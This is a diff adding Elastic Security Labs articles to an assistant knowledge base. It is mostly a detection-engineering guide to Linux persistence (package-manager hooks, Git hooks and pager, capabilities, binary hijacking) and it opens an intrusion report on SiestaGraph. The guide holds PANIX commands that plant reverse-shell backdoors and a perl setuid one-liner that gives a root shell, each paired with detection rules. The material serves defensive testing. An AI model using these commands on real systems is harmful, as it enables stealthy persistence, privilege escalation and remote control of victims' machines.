+Cron follows a similar structure; however, it is slightly more difficult to catch the malicious activity, as the child process of `udevadm` is `bash`, which is not unusual.
+
+![Events generated as a result of Udev Cron persistence establishment](/assets/images/sequel-on-persistence-mechanisms/image5.png "Events generated as a result of Udev Cron persistence establishment")
+
+Finally, when looking at the documents generated by Udev in combination with Systemd, we see the following:
+
+![Events generated as a result of Udev Systemd persistence establishment](/assets/images/sequel-on-persistence-mechanisms/image9.png "Events generated as a result of Udev Systemd persistence establishment")
+
+Which also does not show a relationship with udev, other than the `12-systemdtest.rules` file that is created. 
+
+This leads these last two mechanisms to be detected through our previous systemd/cron related rules, rather than specific udev rules. Let’s take a look at the coverage (We omitted the `systemd`/`cron` rules, as these were already mentioned in [the previous persistence blog](https://www.elastic.co/security-labs/primer-on-persistence-mechanisms)):
+
+| Category | Coverage                                             |
+|----------|------------------------------------------------------|
+| File     | [Systemd-udevd Rule File Creation](https://github.com/elastic/detection-rules/blob/main/rules/linux/persistence_udev_rule_creation.toml)                     |
+|          | [Potential Persistence via File Modification](https://github.com/elastic/detection-rules/blob/main/rules/integrations/fim/persistence_suspicious_file_modifications.toml)          |
+| Process  | [At Utility Launched through Udevadm](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/linux/persistence_at_utility_launched_through_udevadm.toml)                  |
+|          | [Executable Bit Set for Potential Persistence Script](https://github.com/elastic/detection-rules/blob/main/rules/linux/persistence_potential_persistence_script_executable_bit_set.toml)  |
+| Network  | [Udev Execution Followed by Egress Network Connection](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/linux/persistence_udev_execution_followed_by_egress_network_connection.toml) |
+
+### Hunting for T1546 - udev
+
+Hunting for Udev persistence can be conducted through ES|QL and OSQuery. By leveraging ES|QL, we can detect unusual file creations and process executions, and through OSQuery we can do live hunting on our managed systems. To get you started, we created the [Persistence via Udev](https://github.com/elastic/detection-rules/blob/main/hunting/linux/queries/persistence_via_udev.toml) rule, containing several different queries.
+
+## T1546.016 - event triggered execution: installer packages
+
+Package managers are tools responsible for installing, updating, and managing software packages. Three widely used package managers are [APT](https://linux.die.net/man/8/apt) (Advanced Package Tool), [YUM](https://man7.org/linux/man-pages/man8/yum.8.html) (Yellowdog Updater, Modified), and YUM’s successor, [DNF](https://man7.org/linux/man-pages/man8/dnf.8.html) (Danified YUM). Beyond their legitimate uses, these tools can be leveraged by attackers to establish persistence on a system by hijacking the package manager execution flow, ensuring malicious code is executed during routine package management operations. MITRE details information related to this technique under the identifier [T1546.016](https://attack.mitre.org/techniques/T1546/016/).
+
+### T1546.016 - installer packages (APT)
+
+[APT](https://linux.die.net/man/8/apt) is the default package manager for Debian-based Linux distributions like Debian, Ubuntu, and their derivatives. It simplifies the process of managing software packages and dependencies. APT utilizes several configuration mechanisms to customize its behavior and enhance package management efficiency. 
+
+[APT hooks](https://manpages.debian.org/testing/apt/apt.conf.5.en.html) allow users to execute scripts or commands at specific points during package installation, removal, or upgrade operations. These hooks are stored in `/etc/apt/apt.conf.d/` and can be leveraged to execute actions pre- and post-installation. The structure of APT configuration files follows a numeric ordering convention to control the application of configuration snippets that customize various aspects of APT's behavior. A regular APT hook looks like this:
+
+```
+DPkg::Post-Invoke {"if [ -d /var/lib/update-notifier ]; then touch /var/lib/update-notifier/dpkg-run-stamp; fi; /usr/lib/update-notifier/update-motd-updates-available 2>/dev/null || true";};                                                                            APT::Update::Post-Invoke-Success {"/usr/lib/update-notifier/update-motd-updates-available 2>/dev/null || true";}; 
+```
+
+These configuration files can be exploited by attackers to execute malicious binaries or code whenever an APT operation is executed. This vulnerability extends to automated processes like auto-updates, enabling persistent execution on systems with automatic update features enabled.
+
+#### Persistence through T1546.016 - installer packages (APT)
+
+To test this method, a Debian-based system that leverages APT or the manual installation of APT is required. Make sure that if you perform this step manually, that you do not break the APT package manager, as [a carefully crafted payload](https://github.com/Aegrah/PANIX/blob/main/panix.sh#L2021C4-L2021C138) that detaches and runs in the background is necessary to not interrupt the execution chain. You can setup APT persistence by running:
+
+```
+> sudo ./panix.sh --package-manager --ip 192.168.1.1 --port 2012 --apt
+> [+] APT persistence established
+```
+
+To trigger the payload, run an APT command, such as `sudo apt update`. This will spawn a reverse shell. Let’s take a look at the events in Discover:
+
+![Events generated as a result of package manager (APT) persistence establishment](/assets/images/sequel-on-persistence-mechanisms/image10.png "Events generated as a result of package manager (APT) persistence establishment")
+
+In the figure above, we see PANIX being executed, creating the `01python-upgrades` file, and successfully establishing the APT hook. After running `sudo apt update`, APT reads the configuration file and executes the payload, initiating the `sh` → `nohup` → `setsid` → `bash` reverse shell chain. Our coverage is multi-layered, and detects the following events:
+
+| Category | Coverage                                          |
+|----------|---------------------------------------------------|
+| File     | [APT Package Manager Configuration File Creation](https://github.com/elastic/detection-rules/blob/main/rules/linux/persistence_apt_package_manager_file_creation.toml)   |
+|          | [Potential Persistence via File Modification](https://github.com/elastic/detection-rules/blob/main/rules/integrations/fim/persistence_suspicious_file_modifications.toml)       |
+| Process  | [Suspicious APT Package Manager Execution](https://github.com/elastic/detection-rules/blob/main/rules/linux/persistence_apt_package_manager_execution.toml)          |
+|          | [APT Package Manager Command Execution](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/linux/persistence_apt_package_manager_command_execution.toml)             |
+| Network  | [Suspicious APT Package Manager Network Connection](https://github.com/elastic/detection-rules/blob/main/rules/linux/persistence_apt_package_manager_netcon.toml) |
+|          | [APT Package Manager Egress Network Connection](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/linux/persistence_apt_package_manager_egress_network_connection.toml)     |
+
+### T1546.016 - installer packages (YUM)
+
+[YUM](https://man7.org/linux/man-pages/man8/yum.8.html) (Yellowdog Updater, Modified) is the default package management system used in Red Hat-based Linux distributions like CentOS and Fedora. YUM employs [plugin architecture](https://docs.redhat.com/en/documentation/red_hat_enterprise_linux/6/html/deployment_guide/sec-yum_plugins) to extend its functionality, allowing users to integrate custom scripts or programs that execute at various stages of the package management lifecycle. These plugins are stored in specific directories and can perform actions such as logging, security checks, or custom package handling.
+
+The structure of YUM plugins typically involves placing them in directories like:
+
+* `/etc/yum/pluginconf.d/` (for configuration files)
+* `/usr/lib/yum-plugins/` (for plugin scripts)
+
+For plugins to be enabled, the `/etc/yum.conf` file must have the `plugins=1` set. These plugins can intercept YUM operations, modify package installation behaviors, or execute additional actions before or after package transactions. YUM plugins are quite extensive, but a basic YUM plugin template might look like [this](http://yum.baseurl.org/wiki/WritingYumPlugins.html):
+
+```
+from yum.plugins import PluginYumExit, TYPE_CORE, TYPE_INTERACTIVE
+
+requires_api_version = '2.3'
+plugin_type = (TYPE_CORE, TYPE_INTERACTIVE)
+
+def init_hook(conduit):
+    conduit.info(2, 'Hello world')
+
+def postreposetup_hook(conduit):
+    raise PluginYumExit('Goodbye')
+```
+
+Each plugin must be enabled through a `.conf` configuration file:
+
+```
+[main]                                                                                                                               enabled=1
+```
+
+Similar to APT's configuration files, YUM plugins can be leveraged by attackers to execute malicious code during routine package management operations, particularly during automated processes like system updates, thereby establishing persistence on vulnerable systems.
+
+#### Persistence through T1546.016 - Installer Packages (YUM)
+
+Similar to APT, YUM plugins should be crafted carefully to not interfere with the YUM update execution flow. Use [this example](https://github.com/Aegrah/PANIX/blob/main/panix.sh#L2025-L2047) or set it up by running:
+
+```
+> sudo ./panix.sh --package-manager --ip 192.168.1.1 --port 2012 --yum
+[+] Yum persistence established
+```
+
+After planting the persistence mechanism, a command similar to `sudo yum upgrade` can be run to establish a reverse connection.
+
+![Events generated as a result of package manager (YUM) persistence establishment](/assets/images/sequel-on-persistence-mechanisms/image1.png "Events generated as a result of package manager (YUM) persistence establishment")
+
+We see PANIX being executed, `/usr/lib/yumcon`, `/usr/lib/yum-plugins/yumcon.py` and `/etc/yum/pluginconf.d/yumcon.conf` being created. `/usr/lib/yumcon` is executed by `yumcon.py`, which is enabled in `yumcon.conf`. After updating the system, the reverse shell execution chain (`yum` → `sh` → `setsid` → `yumcon` → `python`) is executed. Similar to APT, our YUM coverage is multi-layered, and detects the following events:
+
+| Category | Coverage                                              |
+|----------|-------------------------------------------------------|
+| File     | [Yum Package Manager Plugin File Creation](https://github.com/elastic/detection-rules/blob/main/rules/linux/persistence_yum_package_manager_plugin_file_creation.toml)              |
+|          | [Potential Persistence via File Modification](https://github.com/elastic/detection-rules/blob/main/rules/integrations/fim/persistence_suspicious_file_modifications.toml)           |
+| Process  | [Yum/DNF Plugin Status Discovery](https://github.com/elastic/detection-rules/blob/main/rules/linux/discovery_yum_dnf_plugin_detection.toml)                       |
+| Network  | [Egress Connection by a YUM Package Manager Descendant](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/linux/persistence_egress_connection_by_a_yum_package_manager_descendant.toml) |
+
+### T1546.016 - installer packages (DNF)
+
+[DNF](https://man7.org/linux/man-pages/man8/dnf.8.html) (Dandified YUM) is the next-generation package manager used in modern Red Hat-based Linux distributions, including Fedora and CentOS. It replaces YUM while maintaining compatibility with YUM repositories and packages. Similar to YUM, DNF utilizes a [plugin system](https://docs.redhat.com/it/documentation/red_hat_enterprise_linux/9/html/managing_software_with_the_dnf_tool/assembly_configuring-yum_managing-software-with-the-dnf-tool#proc_enabling-and-disabling-yum-plug-ins_assembly_configuring-yum) to extend its functionality, enabling users to integrate custom scripts or programs that execute at key points in the package management lifecycle.
+
+DNF plugins enhance its capabilities by allowing customization and automation beyond standard package management tasks. These plugins are stored in specific directories:
+
+* `/etc/dnf/pluginconf.d/` (for configuration files)
+* `/usr/lib/python3.9/site-packages/dnf-plugins/` (for plugin scripts)
+
+Of course the location for the dnf-plugins are bound to the Python version that is running on your system. Similarly to YUM, to enable a plugin, `plugins=1` must be set in `/etc/dnf/dnf.conf`. An example of a DNF plugin can look like this:
+
+```
+import dbus
+import dnf
+from dnfpluginscore import _
+
+class NotifyPackagekit(dnf.Plugin):
+	name = "notify-packagekit"
+
+	def __init__(self, base, cli):
+		super(NotifyPackagekit, self).__init__(base, cli)
+		self.base = base
+		self.cli = cli
+	def transaction(self):
+		try:
+			bus = dbus.SystemBus()
+			proxy = bus.get_object('org.freedesktop.PackageKit', '/org/freedesktop/PackageKit')
+			iface = dbus.Interface(proxy, dbus_interface='org.freedesktop.PackageKit')
+			iface.StateHasChanged('posttrans')
+		except:
+			pass 
+```
+
+
+As for YUM, each plugin must be enabled through a `.conf` configuration file:
+
+```
+[main]                                                                                                                               enabled=1
+```
+
+Similar to YUM's plugins and APT's configuration files, DNF plugins can be exploited by malicious actors to inject and execute unauthorized code during routine package management tasks. This attack vector extends to automated processes such as system updates, enabling persistent execution on systems with DNF-enabled repositories.
+
+#### Persistence through T1546.016 - installer packages (DNF)
+
+Similar to APT and YUM, DNF plugins should be crafted carefully to not interfere with the DNF update execution flow. You can use the following [example](https://github.com/Aegrah/PANIX/blob/main/panix.sh#L2049-L2069) or set it up by running:
+
+```
+> sudo ./panix.sh --package-manager --ip 192.168.1.1 --port 2013 --dnf
+> [+] DNF persistence established
+```
+
+Running a command similar to `sudo dnf update` will trigger the backdoor. Take a look at the events:
+
+![Events generated as a result of package manager (DNF) persistence establishment](/assets/images/sequel-on-persistence-mechanisms/image12.png "Events generated as a result of package manager (DNF) persistence establishment")
+
+After the execution of PANIX, `/usr/lib/python3.9/site-packages/dnfcon`, `/etc/dnf/plugins/dnfcon.conf` and `/usr/lib/python3.9/site-packages/dnf-plugins/dnfcon.py` are created, and the backdoor is established. These locations are dynamic, based on the Python version in use. After triggering it through the `sudo dnf update` command, the `dnf` → `sh` → `setsid` → `dnfcon` → `python` reverse shell chain is initiated. Similar to before, our DNF coverage is multi-layered, and detects the following events:
+
+| Category | Coverage                                              |
+|----------|-------------------------------------------------------|
+| File | [DNF Package Manager Plugin File Creation](https://github.com/elastic/detection-rules/blob/main/rules/linux/persistence_dnf_package_manager_plugin_file_creation.toml)|
+|          | [Potential Persistence via File Modification](https://github.com/elastic/detection-rules/blob/main/rules/integrations/fim/persistence_suspicious_file_modifications.toml)           |
+| Process  | [Yum/DNF Plugin Status Discovery](https://github.com/elastic/detection-rules/blob/main/rules/linux/discovery_yum_dnf_plugin_detection.toml)                       |
+| Network  | [Egress Connection by a DNF Package Manager Descendant](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/linux/persistence_egress_connection_by_a_dnf_package_manager_descendant.toml) |
+
+### Hunting for persistence through T1546.016 - installer packages
+
+Hunting for Package Manager persistence can be conducted through ES|QL and OSQuery. Indicators of compromise may include configuration and plugin file creations/modifications and unusual executions of APT/YUM/DNF parents. The [Persistence via Package Manager](https://github.com/elastic/detection-rules/blob/main/hunting/linux/queries/persistence_via_package_manager.toml) rule contains several ES|QL/OSQuery queries that you can use to detect these abnormalities.
+
+## T1546 - event triggered execution: Git 
+
+[Git](https://manpages.debian.org/stretch/git-man/git.1.en.html) is a distributed version control system widely used for managing source code and coordinating collaborative software development. It tracks changes to files and enables efficient team collaboration across different locations. This makes Git a system that is present in a lot of organizations across both workstations and servers. Two functionalities that can be (ab)used for arbitrary code execution are [Git hooks](https://git-scm.com/book/en/v2/Customizing-Git-Git-Hooks) and [Git pager](https://www.mslinn.com/git/200-git-pager.html). MITRE has no specific technique attributed to these persistence mechanisms, but they would best fit [T1546](https://attack.mitre.org/techniques/T1546/).
+
+### T1546 - event triggered execution: Git hooks
+
+[Git hooks](https://git-scm.com/book/en/v2/Customizing-Git-Git-Hooks) are scripts that Git executes before or after specific events such as commits, merges, and pushes. These hooks are stored in the `.git/hooks/` directory within each Git repository. They provide a mechanism for customizing and automating actions during the Git workflow. Common Git hooks include `pre-commit`, `post-commit`, `pre-merge`, and `post-merge`.
+
+An example of a Git hook would be the file `.git/hooks/pre-commit`, with the following contents:
+
+```
+#!/bin/sh
+# Check if this is the initial commit
+if git rev-parse --verify HEAD >/dev/null 2>&1
+then
+    echo "pre-commit: About to create a new commit..."
+    against=HEAD
+else
+    echo "pre-commit: About to create the first commit..."
+    against=4b825dc642cb6eb9a060e54bf8d69288fbee4904
+fi
+```
+
+As these scripts are executed on specific actions, and the contents of the scripts can be changed in whatever way the user wants, this method can be abused for persistence. Additionally, this method does not require root privileges, making it a convenient persistence technique for instances where root privileges are not yet obtained. These scripts can also be added to Github repositories prior to cloning, turning them into initial access vectors as well. 
+
+### T1546 - event triggered execution: git pager
+
+A [pager](https://en.wikipedia.org/wiki/Terminal_pager) is a program used to view content one screen at a time. It allows users to scroll through text files or command output without the text scrolling off the screen. Common pagers include [less](https://www.commandlinux.com/man-page/man1/pager.1.html), [more](https://man7.org/linux/man-pages/man1/more.1.html), and [pg](https://man7.org/linux/man-pages/man1/pg.1.html). A [Git pager](https://www.mslinn.com/git/200-git-pager.html) is a specific use of a pager program to display the output of Git commands. Git allows users to configure a pager to control the display of commands such as `git log`.
+
+Git determines which pager to use through the following order of configuration:
+
+* `/etc/gitconfig` (system-wide)
+* `~/.gitconfig` or `~/.config/git/config` (user-specific)
+* `.git/config` (repository specific)
+
+A typical configuration where a pager is specified might look like this:
+
+```
+[core]
+    pager = less
+```
+
+In this example, Git is configured to use less as the pager. When a user runs a command like `git log`, Git will pipe the output through less for easier viewing. The flexibility in specifying a pager can be exploited. For example, an attacker can set the pager to a command that executes arbitrary code. This can be done by modifying the `core.pager` configuration to include malicious commands. Let’s take a look at the two techniques discussed in this section. 
+
+### Persistence through T1546 - Git
+
+To test these techniques, the system requires a cloned Git repository. There is no point in setting up a custom repository, as the persistence mechanism depends on user actions, making a hidden and unused Git repository an illogical construct. You could initialize your own hidden repository and chain it together with a `cron`/`systemd`/`udev` persistence mechanism to initialize the repository on set intervals, but that is out of scope for now.
+
+To test the Git Hook technique, ensure a Git repository is available on the system, and run:
+
+```
+> ./panix.sh --git --default --ip 192.168.1.1 --port 2014 --hook
+```
+
+`> [+] Created malicious pre-commit hook in /home/ruben/panix`
+
+The program loops through the entire filesystem (as far as this is possible, based on permissions), finds all of the repositories, and backdoors them. To trigger the backdoor, run `git add -A` and `git commit -m "backdoored!"`. This will generate the following events:
+
+![Events generated as a result of the Git Hook persistence establishment](/assets/images/sequel-on-persistence-mechanisms/image3.png "Events generated as a result of the Git Hook persistence establishment")
+
+In this figure we see PANIX looking for Git repositories, adding a `pre-commit` hook and granting it execution permissions, successfully planting the backdoor. Next, the backdoor is initiated through the `git commit`, and the `git` → `pre-commit` → `nohup` → `setsid` → `bash` reverse shell connection is initiated.
+
+To test the Git pager technique, ensure a Git repository is available on the system and run: 
+
+```
+> ./panix.sh --git --default --ip 192.168.1.1 --port 2015 --pager
+> [+] Updated existing Git config with malicious pager in /home/ruben/panix
+> [+] Updated existing global Git config with malicious pager 
+```
+
+To trigger the payload, move into the backdoored repository and run a command such as `git log`. This will trigger the following events:
+
+![Events generated as a result of the Git Pager persistence establishment](/assets/images/sequel-on-persistence-mechanisms/image15.png "Events generated as a result of the Git Pager persistence establishment")
+
+PANIX executes and starts searching for Git repositories. Once found, the configuration files are updated or created, and the backdoor is planted. Invoking the Git Pager (`less`) executes the backdoor, setting up the `git` → `sh` → `nohup` → `setsid` → `bash` reverse connection chain. 
+
+We have several layers of detection, covering the Git Hook/Pager persistence techniques.
+
+| Category | Coverage                                            |
+|----------|-----------------------------------------------------|
+| File     | [Git Hook Created or Modified](https://github.com/elastic/detection-rules/blob/main/rules/linux/persistence_git_hook_file_creation.toml)                        |
+| Process  | [Git Hook Child Process](https://github.com/elastic/detection-rules/blob/main/rules/linux/persistence_git_hook_process_execution.toml)                              |
+|          | [Git Hook Command Execution](https://github.com/elastic/detection-rules/blob/main/rules/linux/persistence_git_hook_execution.toml)                          |
+|          | [Linux Restricted Shell Breakout via Linux Binary(s)](https://github.com/elastic/detection-rules/blob/main/rules/linux/execution_shell_evasion_linux_binary.toml) |
+| Network  | [Git Hook Egress Network Connection](https://github.com/elastic/detection-rules/blob/main/rules/linux/persistence_git_hook_netcon.toml)                  |
+
+### Hunting for persistence through T1546 - Git
+
+Hunting for Git Hook/Pager persistence can be conducted through ES|QL and OSQuery. Potential indicators include file creations in the `.git/hook/` directories, Git Hook executions, and the modification/creation of Git configuration files. The [Git Hook/Pager Persistence](https://github.com/elastic/detection-rules/blob/main/hunting/linux/queries/persistence_via_git_hook_pager.toml) hunting rule has several ES|QL and OSQuery queries that will aid in detecting this technique.
+
+## T1548 - abuse elevation control mechanism: process capabilities
+
+[Process capabilities](https://man7.org/linux/man-pages/man7/capabilities.7.html) are a fine-grained access control mechanism that allows the division of the root user's privileges into distinct units. These capabilities can be independently enabled or disabled for processes, and are used to enhance security by limiting the privileges of processes. Instead of granting a process full root privileges, only the necessary capabilities are assigned, reducing the risk of exploitation. This approach follows the principle of least privilege.
+
+To better understand them, some use cases for process capabilities are e.g. assigning `CAP_NET_BIND_SERVICE` to a web server that needs to bind to port 80, assigning `CAP_NET_RAW` to tools that need access to network interfaces or assigning `CAP_DAC_OVERRIDE` to backup software requiring access to all files. By leveraging these capabilities, processes are capable of performing tasks that are usually only possible with root access.
+
+While process capabilities were developed to enhance security, once root privileges are acquired, attackers can abuse them to maintain persistence on a compromised system. By setting specific capabilities on binaries or scripts, attackers can ensure their malicious processes can operate with elevated privileges and allow for an easy way back to root access in case of losing it. Additionally, misconfigurations may allow attackers to escalate privileges. 
+
+Some process capabilities can be (ab)used to establish persistence, escalate privileges, access sensitive data, or conduct other tasks. Process capabilities that can do this include, but are not limited to:
+
+* `CAP_SYS_MODULE` (allows loading/unloading of kernel modules)
+* `CAP_SYS_PTRACE` (enables tracing and manipulation of other processes)
+* `CAP_DAC_OVERRIDE` (bypasses read/write/execute checks)
+* `CAP_DAC_READ_SEARCH` (grants read access to any file on the system)
+* `CAP_SETUID`/`CAP_SETGID` (manipulate UID/GID)
+* `CAP_SYS_ADMIN` (to be honest, this just means root access)
+
+A simple way of establishing persistence is to grant the process `CAP_SETUID` or `CAP_SETGID` capabilities (this is similar to setting the `SUID`/`SGID` bit to a process, which we discussed in [the previous persistence blog](https://www.elastic.co/security-labs/primer-on-persistence-mechanisms)). But all of the ones above can be used, be a bit creative here! MITRE does not have a technique dedicated to process capabilities. Similar to Setuid/Setgid, this technique can be leveraged for both privilege escalation and persistence. The most logical technique to add this mechanism to (based on the existing structure of the MITRE ATT&CK framework) would be [T1548](https://attack.mitre.org/techniques/T1548/). 
+
+### Persistence through T1548 - process capabilities
+
+Let’s leverage PANIX to set up a process with `CAP_SETUID` process capabilities by running:
+
+```
+> sudo ./panix.sh --cap --default
+[+] Capability setuid granted to /usr/bin/perl
+[-] ruby, is not present on the system.
+[-] php is not present on the system.
+[-] python is not present on the system.
+[-] python3, is not present on the system.
+[-] node is not present on the system. 
+```
+
+PANIX will by-default check for a list of processes that are easily exploitable after granting `CAP_SETUID` capabilities. You can use `--custom` and specify `--capability` and `--binary` to test some of your own. 
+
+If your system has `Perl`, you can take a look at [GTFOBins](https://gtfobins.github.io/gtfobins/perl/) to find how to escalate privileges with this capability set. 
+
+```
+/usr/bin/perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'
+# whoami
+root
+```
+
+Looking at the logs in Discover, we can see the following happening:
+
+![Events generated as a result of the Linux capability persistence establishment](/assets/images/sequel-on-persistence-mechanisms/image13.png "Events generated as a result of the Linux capability persistence establishment")
+
+We can see PANIX being executed with `uid=0` (root), which grants `cap_setuid+ep` (effective and permitted) to `/usr/bin/perl`. Effective indicates that the capability is currently active for the process, while permitted indicates that the capability is allowed to be used by the process. Note that all events with `uid=0` have all effective/permitted capabilities set. After granting this capability and dropping down to user permissions, `perl` is executed and manipulates its own process UID to obtain root access. Feel free to try out different binaries/permissions.
+
+As we have quite an extensive list of rules related to process capabilities (for discovery, persistence and privilege escalation activity), we will not list all of them here. Instead, you can take a look at [this blog post](https://www.elastic.co/security-labs/unlocking-power-safely-privilege-escalation-via-linux-process-capabilities), digging deeper into this topic.
+
+### Hunting for persistence through T1548 - process capabilities
+
+Hunting for process capability persistence can be done through ES|QL. We can either do a general hunt and find non uid 0 binaries with capabilities set, or hunt for specific potentially dangerous capabilities. To do so, we created the [Process Capability Hunting](https://github.com/elastic/detection-rules/blob/main/hunting/linux/queries/privilege_escalation_via_process_capabilities.toml) rule.
+
+## T1554 - compromise host software binary: hijacking system binaries
+
+After gaining access to a system and, if necessary, escalating privileges to root access, system binary hijacking/wrapping is another option to establish persistence. This method relies on the trust and frequent execution of system binaries by a user. 
+
+System binaries, located in directories like `/bin`, `/sbin`, `/usr/bin`, and `/usr/sbin` are commonly used by users/administrators to perform basic tasks. Attackers can hijack these system binaries by replacing or backdooring them with malicious counterparts. System binaries that are used often such as `cat`, `ls`, `cp`, `mv`, `less` or `sudo` are perfect candidates, as this mechanism relies on the user executing the binary. 
+
+There are multiple ways to establish persistence through this method. The attacker may manipulate the system’s `$PATH` environment variable to prioritize a malicious binary over the regular system binary. Another method would be to replace the real system binary, executing arbitrary malicious code on launch, after which the regular command is executed.
+
+Attackers can be creative in leveraging this technique, as any code can be executed. For example, the system-wide `sudo`/`su` binaries can be backdoored to capture a password every time a user attempts to run a command with `sudo`. Another method can be to establish a reverse connection every time a binary is executed or a backdoor binary is called on each binary execution. As long as the attacker hides well and no errors are presented to the user, this technique is difficult to detect. MITRE does not have a direct reference to this technique, but it probably fits [T1554](https://attack.mitre.org/techniques/T1554/) best.
+
+Let’s take a look at what hijacking system binaries might look like. 
+
+### Persistence through T1554 - hijacking system binaries
+
+The implementation of system binary hijacking in PANIX leverages the wrapping of a system binary to establish a reverse connection to a specified IP. You can reference this [example](https://github.com/Aegrah/PANIX/blob/main/panix.sh#L2391-L2401) or set it up by executing:
+
+```
+> sudo ./panix.sh --system-binary --default --ip 192.168.1.1 --port 2016
+> [+] cat backdoored successfully.
+> [+] ls backdoored successfully.
+```
+
+Now, execute `ls` or `cat` to establish persistence. Let’s analyze the logs. 
+
+![Events generated as a result of the Linux system binary hijacking persistence establishment](/assets/images/sequel-on-persistence-mechanisms/image11.png "Events generated as a result of the Linux system binary hijacking persistence establishment")
+
+In the figure above we see PANIX executing, moving `/usr/bin/ls` to `/usr/bin/ls.original`. It then backdoors `/usr/bin/ls` to execute arbitrary code, after which it calls `/usr/bin/ls.original` in order to trick the user. Afterwards, we see `bash` setting up the reverse connection. The copying/renaming of system binaries and the hijacking of the `sudo` binary are captured in the following detection rules.
+
+| Category | Coverage                      |
+|----------|-------------------------------|
+| File     | [System Binary Moved or Copied](https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_binary_copied_to_suspicious_directory.toml) |
+|          | [Potential Sudo Hijacking](https://github.com/elastic/detection-rules/blob/main/rules/linux/privilege_escalation_sudo_hijacking.toml)      |
+
+### Hunting for persistence through T1554 - hijacking system binaries
+
+This activity should be very uncommon, and therefore the detection rules above can be leveraged for hunting. Another way of hunting for this activity could be assembling a list of uncommon binaries to spawn child processes. To aid in this process we created the [Unusual System Binary Parent (Potential System Binary Hijacking Attempt)](https://github.com/elastic/detection-rules/blob/main/hunting/linux/queries/persistence_via_unusual_system_binary_parent.toml) hunting rule.
+
+## Conclusion
+
+In this part of our “Linux Detection Engineering” series, we explored more advanced Linux persistence techniques and detection strategies, including init systems, run control scripts, message of the day, udev (rules), package managers, Git, process capabilities, and system binary hijacking. If you missed the previous part on persistence, catch up [here](https://www.elastic.co/security-labs/primer-on-persistence-mechanisms).
+
+We did not only explain each technique but also demonstrated how to implement them using [PANIX](https://github.com/Aegrah/PANIX). This hands-on approach allowed you to assess detection capabilities in your own security setup. Our discussion included detection and endpoint rule coverage and referenced effective hunting strategies, from ES|QL aggregation queries to live OSQuery hunts.
+
+We hope you've found this format informative. Stay tuned for more insights into Linux detection engineering. Happy hunting!
diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/siestagraph_new_implant_uncovered_in_asean_member_foreign_ministry.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/siestagraph_new_implant_uncovered_in_asean_member_foreign_ministry.md
new file mode 100644
index 0000000000000..72857d69f89d8
--- /dev/null
+++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/siestagraph_new_implant_uncovered_in_asean_member_foreign_ministry.md
@@ -0,0 +1,467 @@
+---
+title: "SiestaGraph: New implant uncovered in ASEAN member foreign ministry"
+slug: "siestagraph-new-implant-uncovered-in-asean-member-foreign-ministry"
+date: "2022-12-16"
+subtitle: "Elastic Security Labs is tracking an active intrusion, by likely multiple threat actors, into the Foreign Affairs office of an ASEAN member."
+description: "Elastic Security Labs is tracking likely multiple on-net threat actors leveraging Exchange exploits, web shells, and the newly discovered SiestaGraph implant to achieve and maintain access, escalate privilege, and exfiltrate targeted data."
+author:
+  - slug: samir-bousseaden
+  - slug: andrew-pease
+  - slug: daniel-stepanic
+  - slug: salim-bitam
+  - slug: seth-goodwin
+  - slug: devon-kerr
+image: "photo-edited09.jpg"
+category:
+  - slug: attack-pattern
+tags:
+  - ref2924
+  - siestagraph
+  - doorme
+---
+
+## Key takeaways
+
+- Likely multiple threat actors are accessing and performing live on-net operations against the Foreign Affairs Office of an ASEAN member using a likely vulnerable, and internet-connected, Microsoft Exchange server. Once access was achieved and secured, the mailboxes of targeted individuals were exported.
+- Threat actors deployed a custom malware backdoor that leverages the Microsoft Graph API for command and control, which we’re naming SiestaGraph.
+- A modified version of an IIS backdoor called DoorMe was leveraged with new functionality to allocate shellcode and load additional implants.
+
+## Preamble
+
+In early December, Elastic Security Labs observed Powershell commands used to collect and export mailboxes from an internet-connected Microsoft Exchange server for the Foreign Affairs Office of an Association of Southeast Asian Nations (ASEAN) member.
+
+In spite of diverse security instrumentation observed during this activity, the threat actors were able to achieve:
+
+- The execution of malware on Exchange Servers, Domain Controllers, and workstations
+- Exfiltration of targeted user and group mailboxes
+- Deploy web shells
+- Move laterally to user workstations
+- Perform internal reconnaissance
+- Collect Windows credentials
+
+Because the intrusion is ongoing and covers almost the entire MITRE ATT&CK framework, the analysis sections will use a timeline approach.
+
+> For a deep dive analysis of the SIESTAGRAPH, DOORME, or SHADOWPAD malware families, check out our [follow on publication](https://www.elastic.co/security-labs/update-to-the-REF2924-intrusion-set-and-related-campaigns) that covers those in detail. In addition, there are associations between this campaign and others based on other observations and 3rd party reporting.
+>
+> _Updated: 2/2/2023_
+
+## Analysis
+
+The investigation, which we’re tracking as REF2924, began with the execution of a Powershell command used to export a user mailbox. While this is a normal administrative function, the commands were executed with a process ancestry starting with the IIS Worker Process ( **w3wp.exe** ) as a parent process of **cmd.exe** , and **cmd.exe** executing Powershell.
+
+These events started the investigation that later identified multiple threat actors within the contested network environment.
+
+The first events observed from this cluster of activity were on November 26, 2022, with the detection of a malicious file execution on a Domain Controller. Because of this, it is likely [Elastic Defend](https://docs.elastic.co/en/integrations/endpoint) was deployed post-initial compromise and was deployed in “Detect” mode. Throughout our analysis, we observed other security instrumentation tools in the environment indicating the victim was aware of the intrusion and trying to evict the threat actors.
+
+Because of the multiple malware samples achieving similar goals, various DLL sideloading observations, and the presence of a likely internet-connected Exchange server; we believe that there are multiple threat actors or threat groups working independently or in tandem with each other.
+
+### November 26–30, 2022
+
+#### Malware execution
+
+The earliest known evidence of compromise occurred on November 26, 2022, with the execution of a file called **OfficeClient.exe** executed from \*\*C:\ProgramData\Microsoft\*\* on a Domain Controller.
+
+10-minutes after **OfficeClient.exe** was executed on the Domain Controller, another malicious file was executed on another Windows 2019 server. This file was called **Officeclient.exe** and executed from **c:\windows\pla\*\*. On November 28, 2022, **officeup.exe** was executed on this same Windows 2019 server from **C:\programdata\*\*.
+
+On November 29, 2022, the **OfficeClient.exe** file was executed on an Exchange server as **C:\ProgramData\OfficeCore.exe**.
+
